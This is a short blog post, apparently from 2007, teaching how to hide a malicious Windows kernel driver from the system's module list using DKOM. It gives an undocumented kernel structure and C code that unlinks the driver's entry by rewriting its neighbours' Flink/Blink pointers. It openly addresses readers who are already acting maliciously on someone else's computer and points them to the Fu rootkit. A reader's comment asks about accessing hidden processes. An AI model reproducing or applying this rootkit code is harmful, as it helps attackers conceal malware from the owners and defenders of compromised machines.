If you are already doing something malicious on someone else’s computer, you may as well hide your precious driver. It’s not hard at all, if you already hid processes using the DKOM method (Direct Kernel Object Manipulation) this is going to look familiar to you because we are going to change the FLINK and BLINK pointers of its neighbors.
We are going to use this undocumented structure:
typedef struct _MODULE_ENTRY {
LIST_ENTRY module_list_entry;
DWORD unknown1[4];
DWORD base;
DWORD driver_start;
DWORD unknown2;
UNICODE_STRING driver_Path;
UNICODE_STRING driver_Name;
} MODULE_ENTRY, *PMODULE_ENTRY;
The following MODULE_ENTRY object is used by the kernel to keep track of the drivers in memory. Notice that the first member in the structure is a LIST_ENTRY.
We are going to modify them to make our driver disappear from the linked list. The fallowing code does that.
PMODULE_ENTRY pm_current;
pm_current = *((PMODULE_ENTRY*)((DWORD)DriverObject + 0×14));*((PDWORD)pm_current->module_list_entry.Blink) = (DWORD) pm_current->module_list_entry.Flink;
pm_current->module_list_entry.Flink->Blink = pm_current->module_list_entry.Blink;
We changed the Flink and Blink pointers to the next and previous drivers.
We hid our driver, but you can use the same method to hide other drivers as well. Fu rootkit is a good example of doing so. You can download it from here
For the the source code of this article, click here.
P.S The image is from the book called Rootkit: Subverting the Windows Kernel.
August 28, 2007 at 8:52 am
can we still attached to those hidden process?
Attached to the process and use writeprocess/readprocess on it – similar to iceSwords? Thanks.
Good that I found your site – you got a lot of things here that I’m looking for.
Hope we can have a constant communication. Thanks.